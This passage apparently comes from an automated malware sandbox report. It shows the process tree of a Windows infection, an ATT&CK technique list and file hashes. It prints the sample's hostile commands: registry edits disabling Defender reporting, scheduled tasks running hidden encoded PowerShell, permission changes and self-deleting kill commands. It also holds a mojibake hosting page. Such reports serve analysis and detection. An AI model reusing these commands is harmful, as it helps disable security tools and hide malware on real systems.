/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:6128

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:1380

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:5188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZrfiAnoE" /SC once /ST 10:24:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:6136

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZrfiAnoE"
9⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZrfiAnoE"
9⤵
PID:3780

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
- Executes dropped EXE
PID:260

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 15:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\EyziPlT.exe\" j6 /site_id 525403 /S" /V1 /F
9⤵
- Creates scheduled task(s)
PID:6020

C:\Users\Admin\Documents\hRc97NYZkL2d3CprSj1JTt97.exe
"C:\Users\Admin\Documents\hRc97NYZkL2d3CprSj1JTt97.exe"
6⤵
- Executes dropped EXE
PID:2464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:5564

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:5344

C:\Users\Admin\Documents\9SxC2yE4Jjctffann1DNkldC.exe
"C:\Users\Admin\Documents\9SxC2yE4Jjctffann1DNkldC.exe"
6⤵
- Executes dropped EXE
PID:816

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
7⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 616
7⤵
- Program crash
PID:5296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 1016
7⤵
- Program crash
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 956
7⤵
- Program crash
PID:2148

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
7⤵
PID:2548

C:\Users\Admin\Documents\EbaNDXh5_v7Z9E5QL9QF6hGs.exe
"C:\Users\Admin\Documents\EbaNDXh5_v7Z9E5QL9QF6hGs.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4392

C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe
"C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4740

C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe
"C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe"
7⤵
PID:3940

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\9eb5c5fa-e963-47fe-94aa-4844da67a2f6" /deny *S-1-1-0:(OI)(CI)(DE,DC)
8⤵
- Modifies file permissions
PID:5964

C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe
"C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe" --Admin IsNotAutoStart IsNotTask
8⤵
PID:2688

C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe
"C:\Users\Admin\Documents\fJivHOGcsKZXMrePOZWdOwZW.exe" --Admin IsNotAutoStart IsNotTask
9⤵
PID:4960

C:\Users\Admin\AppData\Local\6a462ebc-9f59-4efe-9f4c-0a5e586b69bb\build2.exe
"C:\Users\Admin\AppData\Local\6a462ebc-9f59-4efe-9f4c-0a5e586b69bb\build2.exe"
10⤵
PID:424

C:\Users\Admin\AppData\Local\6a462ebc-9f59-4efe-9f4c-0a5e586b69bb\build2.exe
"C:\Users\Admin\AppData\Local\6a462ebc-9f59-4efe-9f4c-0a5e586b69bb\build2.exe"
11⤵
PID:1828

C:\Users\Admin\Documents\ZWUGh5XgBT4go7y2rPM_rMd2.exe
"C:\Users\Admin\Documents\ZWUGh5XgBT4go7y2rPM_rMd2.exe"
6⤵
- Executes dropped EXE
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1296
7⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1304
7⤵
- Program crash
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1384
7⤵
- Program crash
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1368
7⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ZWUGh5XgBT4go7y2rPM_rMd2.exe" /f & erase "C:\Users\Admin\Documents\ZWUGh5XgBT4go7y2rPM_rMd2.exe" & exit
7⤵
PID:5524

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ZWUGh5XgBT4go7y2rPM_rMd2.exe" /f
8⤵
- Kills process with taskkill
PID:6036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1176
7⤵
- Program crash
PID:400

C:\Users\Admin\Documents\T_dF5UUChNw18TLzQ8V1CkmY.exe
"C:\Users\Admin\Documents\T_dF5UUChNw18TLzQ8V1CkmY.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4440

C:\Users\Admin\Documents\u7XCUQfhF6ry7vSLBhdxlKPU.exe
"C:\Users\Admin\Documents\u7XCUQfhF6ry7vSLBhdxlKPU.exe"
6⤵
- Executes dropped EXE
PID:1704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im u7XCUQfhF6ry7vSLBhdxlKPU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\u7XCUQfhF6ry7vSLBhdxlKPU.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:3292

C:\Windows\SysWOW64\taskkill.exe
taskkill /im u7XCUQfhF6ry7vSLBhdxlKPU.exe /f
8⤵
- Kills process with taskkill
PID:4828

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:4956

C:\Users\Admin\Documents\vSN2ugPYT9UR4uUD5p7CwSVG.exe
"C:\Users\Admin\Documents\vSN2ugPYT9UR4uUD5p7CwSVG.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:5168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:4976

C:\Users\Admin\Documents\70z9BK6lVdtpscge5w7o6856.exe
"C:\Users\Admin\Documents\70z9BK6lVdtpscge5w7o6856.exe"
6⤵
PID:260

C:\Users\Admin\AppData\Local\Temp\5149G82DFML7HKC.exe
<!DOCTYPE html> <html> <head> <title>￐ﾥ￐ﾾ￑ﾁ￑ﾂ￐ﾸ￐ﾽ￐ﾳ VPS ￐ﾲ￐ﾓ￐ﾵ￑ﾀ￐ﾼ￐ﾰ￐ﾽ￐ﾸ￐ﾸ, ￐ﾲ￑ﾋ￐ﾴ￐ﾵ￐ﾻ￐ﾵ￐ﾽ￐ﾽ￑ﾋ￐ﾵ￑ﾁ￐ﾵ￑ﾀ￐ﾲ￐ﾵ￑ﾀ￑ﾋ - ￐ﾝ￐ﾰ￐ﾴ￐ﾵ￐ﾶ￐ﾽ￑ﾋ￐ﾹ￑ﾅ￐ﾾ￑ﾁ￑ﾂ￐ﾸ￐ﾽ￐ﾳ￐ﾲ￐ﾕ￐ﾲ￑ﾀ￐ﾾ￐﾿￐ﾵ! | FORNEX</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="format-detection" content="telephone=no"> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"> <link rel="apple-touch-icon-precomposed" sizes="57x57" href="/img/favicon/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="/img/favicon/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="/img/favicon/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/img/favicon/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon-precomposed" sizes="60x60" href="/img/favicon/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon-precomposed" sizes="120x120" href="/img/favicon/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon-precomposed" sizes="76x76" href="/img/favicon/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon-precomposed" sizes="152x152" href="/img/favicon/apple-touch-icon-152x152.png"> <link rel="icon" type="image/png" href="/img/favicon/favicon-196x196.png" sizes="196x196"> <link rel="icon" type="image/png" href="/img/favicon/favicon-96x96.png" sizes="96x96"> <link rel="icon" type="image/png" href="/img/favicon/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="/img/favicon/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="/img/favicon/favicon-128.png" sizes="128x128"> <meta name="application-name" content="ￂﾠ"> <meta name="msapplication-TileColor" content="#FFFFFF"> <meta name="msapplication-TileImage" content="/img/favicon/mstile-144x144.png"> <meta name="msapplication-square70x70logo" content="/img/favicon/mstile-70x70.png"> <meta name="msapplication-square150x150logo" content="/img/favicon/mstile-150x150.png"> <meta name="msapplication-wide310x150logo" content="/img/favicon/mstile-310x150.png"> <meta name="msapplication-square310x310logo" content="/img/favicon/mstile-310x310.png"> <link href="/css/base.css" rel="stylesheet"> </head> <body> <header class="header header-bg"> <div style="background-image: url('/img/prlx-bg-main.png');" class="header-bg-image hdn-lg"></div> <div class="wrap"> <div class="header-inner"> <div class="table"> <div class="left-nav table-cell-md"><a href="https://fornex.com/?from=blocked-duoproc.net"><img src="/img/logo.png" srcset="/img/logo@2x.png 2x" alt="" class="logo logo-light"></a><a href="https://fornex.com/?from=blocked-duoproc.net"><img src="/img/logo-dark.png" srcset="/img/logo-dark@2x.png 2x" alt="" class="logo logo-dark"></a></div> <div class="center-nav table-cell-md hdn-lg"> <div class="slogan-note">￐ﾝ￐ﾰ￐ﾴ￐ﾵ￐ﾶ￐ﾽ￑ﾋ￐ﾵ VPS/VDS, ￐ﾲ￑ﾋ￐ﾴ￐ﾵ￐ﾻ￐ﾵ￐ﾽ￐ﾽ￑ﾋ￐ﾵ￑ﾁ￐ﾵ￑ﾀ￐ﾲ￐ﾵ￑ﾀ￑ﾋ￐ﾸ￑ﾅ￐ﾾ￑ﾁ￑ﾂ￐ﾸ￐ﾽ￐ﾳ</div> </div> <div class="table-cell-md ta-r hdn-lg"><a href="https://fornex.com/?from=blocked-duoproc.net" style="color: #fff;"><span class="border border-2x">￐ﾟ￐ﾵ￑ﾀ￐ﾵ￐ﾹ￑ﾂ￐ﾸ￐ﾽ￐ﾰ￑ﾁ￐ﾰ￐ﾹ￑ﾂ</span></a></div> </div> </div> </div> </header> <div class="table blocked-page"> <div class="table-cell-md"> <div class="wrap"> <div class="parts-row parts-2 parts-divide parts-lg-collapse"> <div class="col-item hdn-lg"><img src="/img/icons/blocked.png" srcset="/img/icons/blocked@2x.png 2x" alt=""></div> <div class="col-item"> <div class="alert-title">￐ﾡ￐ﾰ￐ﾹ￑ﾂ￐ﾷ￐ﾰ￐ﾱ￐ﾻ￐ﾾ￐ﾺ￐ﾸ￑ﾀ￐ﾾ￐ﾲ￐ﾰ￐ﾽ <div class="note">Site blocked</div> </div><span class="ttl">￐ﾟ￐ﾾ￐ﾻ￐ﾵ￐ﾷ￐ﾽ￑ﾋ￐ﾵ￑ﾁ￑ﾁ￑ﾋ￐ﾻ￐ﾺ￐ﾸ</span> <div class="parts-row parts-2 parts-md-collapse"> <div class="col-item"> <div class="nav-list"> <ul> <li><a href="https://fornex.com/wiki/why-my-sites-is-blocked/?from=blocked-duoproc.net">￐ﾟ￐ﾾ￑ﾇ￐ﾵ￐ﾼ￑ﾃ￑ﾏ￐ﾲ￐ﾸ￐ﾶ￑ﾃ￑ﾍ￑ﾂ￑ﾃ￑ﾁ￑ﾂ￑ﾀ￐ﾰ￐ﾽ￐ﾸ￑ﾆ￑ﾃ</a></li> <li><a href="https://fornex.com/wiki/transfer-site/?from=blocked-duoproc.net">￐ﾟ￐ﾵ￑ﾀ￐ﾵ￐ﾽ￐ﾾ￑ﾁ￑ﾁ￐ﾰ￐ﾹ￑ﾂ￐ﾾ￐ﾲ</a></li> </ul> </div> </div> <div class="col-item"> <div class="nav-list"> <ul> <li><a href="https://fornex.com/my/tickets/?from=blocked-duoproc.net">￐ﾢ￐ﾵ￑ﾅ￐ﾽ￐ﾸ￑ﾇ￐ﾵ￑ﾁ￐ﾺ￐ﾰ￑ﾏ￐﾿￐ﾾ￐ﾴ￐ﾴ￐ﾵ￑ﾀ￐ﾶ￐ﾺ￐ﾰ</a></li> <li><a href="https://fornex.com/wiki/faq/?from=blocked-duoproc.net">FAQ</a></li> </ul> </div> </div> </div> <hr><span class="ttl">￐ﾣ￑ﾁ￐ﾻ￑ﾃ￐ﾳ￐ﾸ</span> <div class="parts-row parts-6 parts-md-collapse"> <div class="col-item part-6x3"> <div class="nav-list"> <ul> <li><a href="https://fornex.com/dedicated/?from=blocked-duoproc.net">￐ﾒ￑ﾋ￐ﾴ￐ﾵ￐ﾻ￐ﾵ￐ﾽ￐ﾽ￑ﾋ￐ﾵ￑ﾁ￐ﾵ￑ﾀ￐ﾲ￐ﾵ￑ﾀ￑ﾋ</a></li> <li><a href="https://fornex.com/ssd-vps/?from=blocked-duoproc.net">SSD VPS</a></li> </ul> </div> </div> <div class="col-item part-6x2"> <div class="nav-list"> <ul> <li><a href="https://fornex.com/antiddos/?from=blocked-duoproc.net">AntiDDoS</a></li> <li><a href="https://fornex.com/ssd-hosting/?from=blocked-duoproc.net">SSD Hosting</a></li> </ul> </div> </div> <div class="col-item"> <div class="nav-list"> <ul> <li><a href="https://fornex.com/backup/?from=blocked-duoproc.net">￐ﾑ￑ﾍ￐ﾺ￐ﾰ￐﾿</a></li> <li><a href="https://fornex.com/vpn/?from=blocked-duoproc.net">VPN</a></li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> </body> </html>
7⤵
PID:3192

C:\Users\Admin\Documents\I443nt2mtABQDVlDL7VwMRIa.exe
"C:\Users\Admin\Documents\I443nt2mtABQDVlDL7VwMRIa.exe"
6⤵
- Executes dropped EXE
PID:4428

C:\Users\Admin\Documents\I443nt2mtABQDVlDL7VwMRIa.exe
C:\Users\Admin\Documents\I443nt2mtABQDVlDL7VwMRIa.exe
7⤵
PID:4592

C:\Users\Admin\Documents\Ysg0Qxyhae5cu2QWZIgjdBpM.exe
"C:\Users\Admin\Documents\Ysg0Qxyhae5cu2QWZIgjdBpM.exe"
6⤵
- Executes dropped EXE
PID:3432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMgAwAA==
7⤵
PID:5512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout 20
8⤵
PID:844

C:\Windows\SysWOW64\timeout.exe
timeout 20
9⤵
- Delays execution with timeout.exe
PID:5528

C:\Users\Admin\Documents\q8yXuo1vQhktKl6CRa9qYgZj.exe
"C:\Users\Admin\Documents\q8yXuo1vQhktKl6CRa9qYgZj.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1680

C:\Users\Admin\Documents\zBrevb3opsBNYUlKYAKGlQSv.exe
"C:\Users\Admin\Documents\zBrevb3opsBNYUlKYAKGlQSv.exe"
6⤵
PID:4736

C:\Users\Admin\Documents\zBrevb3opsBNYUlKYAKGlQSv.exe
"C:\Users\Admin\Documents\zBrevb3opsBNYUlKYAKGlQSv.exe"
7⤵
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 428
7⤵
- Program crash
PID:5692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_6.exe
zaiqa_6.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4292

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_5.exe
zaiqa_5.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4876

C:\Users\Admin\AppData\Local\Temp\is-2IOLO.tmp\zaiqa_5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2IOLO.tmp\zaiqa_5.tmp" /SL5="$6004A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_5.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_4.exe
zaiqa_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1292

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_4.exe
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_4.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3956

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_3.exe
zaiqa_3.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_2.exe
zaiqa_2.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2088

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_1.exe
zaiqa_1.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4780

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_1.exe" -a
6⤵
- Executes dropped EXE
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3864 -ip 3864
1⤵
PID:788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3964 -ip 3964
1⤵
PID:3764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1964 -ip 1964
1⤵
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2124 -ip 2124
1⤵
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 816 -ip 816
1⤵
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3760 -ip 3760
1⤵
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3760 -ip 3760
1⤵
PID:5152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3864 -ip 3864
1⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2124 -ip 2124
1⤵
PID:5452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 1964 -ip 1964
1⤵
PID:5484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3964 -ip 3964
1⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2124 -ip 2124
1⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2124 -ip 2124
1⤵
PID:5116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2124 -ip 2124
1⤵
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4736 -ip 4736
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2124 -ip 2124
1⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2124 -ip 2124
1⤵
PID:3672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2124 -ip 2124
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2124 -ip 2124
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1440 -ip 1440
1⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5940 -ip 5940
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5940 -ip 5940
1⤵
PID:1632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5940 -ip 5940
1⤵
PID:3116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4904 -ip 4904
1⤵
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 816 -ip 816
1⤵
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5940 -ip 5940
1⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 4904 -ip 4904
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 816 -ip 816
1⤵
PID:3308

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:3760

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 608
3⤵
- Program crash
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5940 -ip 5940
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5808 -ip 5808
1⤵
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4904 -ip 4904
1⤵
PID:3424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5192

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 4668 -ip 4668
1⤵
PID:4964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
7ce5bf24986102a2e8a84e9ac0420f80

SHA1
17e6a06dea871db58c0b3b80958733a856ebd89a

SHA256
eb8767cfcbd28961ddfff507f8c79322b2516fc03267dfc645f75b467380c31b

SHA512
c8845d485dc32c41ab0c2fdc2e4ae611eb90362b5c9beffcb9f5d4040370ea787a64c09dd6d91c6c50485eb0b5f56a8bc167cdfc96d1e6599d482e8616e92356

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zaiqa_4.exe.log
MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurl.dll
MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\libcurl.dll
MD5
